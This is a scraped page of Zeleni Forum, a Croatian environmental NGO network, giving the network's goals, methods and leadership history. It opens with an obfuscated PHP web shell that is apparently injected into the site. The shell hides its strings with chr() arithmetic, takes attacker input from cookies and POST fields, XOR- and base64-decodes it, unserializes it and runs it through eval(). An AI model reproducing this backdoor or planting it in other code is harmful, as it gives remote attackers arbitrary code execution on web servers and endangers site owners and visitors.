$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} Zeleni Forum - Stranica 3 - Mreža udruga za zaštitu okoliša Hrvatske

Mi smo mreža nevladinih okolišnih organizacija Republike Hrvatske s ciljem utjecaja na kreiranje i provedbu politika zaštite okoliša i očuvanja prirode.

Kako se učlaniti?

Istaknute objave

Koji su ciljevi mreže?

Ciljevi mreže su utjecaj na kreiranje i provedbu politika zaštite okoliša i očuvanja prirode RH te stvaranja trajne platforme za suradnju i okoliš udruga građana/ki i ostalih aktivnih aktera okoliša civilnog društva.

Kojim metodama se služimo radi ostvarenja ciljeva mreže?

Metode kojima se služimo radi ostvarivanja ciljeva mreže su:
- javno zagovaranje
- pokretanje i koordinacija zajedničkih kampanja, akcija i projekata
- informiranje, edukacija i poticanje javnosti na sudjelovanje u procesu donošenja odluka
- osnaživanje kapaciteta udruga građana za za zaštitu okoliša, jačanje njihovih vještina, ljudskih potencijala, tehničke infrastrukture i utjecaja na nacionalnoj i međunarodnoj razini

O Zelenom forumu

Zeleni forum djeluje od 1998. godine. Sve članice mreže sastaju se svake godine na godišnjem sastanku. Zeleni forum je od 1998. do lipnja 2001. vodila udruga Zelena akcija iz Zagreba, od lipnja 2001. do veljače 2006. Zelena Istra iz Pule, od veljače 2006. do listopada 2009. Udruga Sunce iz Splita, od listopada 2009. do svibnja 2019. Zelena akcija iz Zagreba, a od svibnja 2019. Udruga Biom iz Zagreba. Tajništvo Zelenog foruma ima zadaću informiranja i koordiniranja, održavanja baze kontakata članica, organiziranja godišnjeg skupa (i manjih sastanaka koordinacije ZF) te koordinacije aktivnosti prikupljanja sredstava za rad mreže. Po potrebi i u dogovoru s koordinacijom, zastupa Zeleni forum u tijelima i medijima.

Ciljevi

utjecaj na kreiranje i provedbu politika zaštite okoliša i
očuvanja prirode u RH
stvaranje trajne platforme za suradnju i okupljanje okolišnih udruga građana/ki i ostalih aktivnih aktera okolišnog civilnog društva

Aktivnosti

utjecaj na kreiranje i provedbu politika zaštite okoliša i
očuvanja prirode u RH
pokretanje i koordinacija zajedničkih kampanja, akcija i projekata
informiranje, edukacija i poticanje javnosti na sudjelovanje u procesu donošenja odluka
osnaživanje kapaciteta udruga građana za zaštitu okoliša, jačanje njihovih vještina, ljudskih potencijala, tehničke infrastrukture i utjecaja na nacionalnoj i međunarodnoj razini
Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske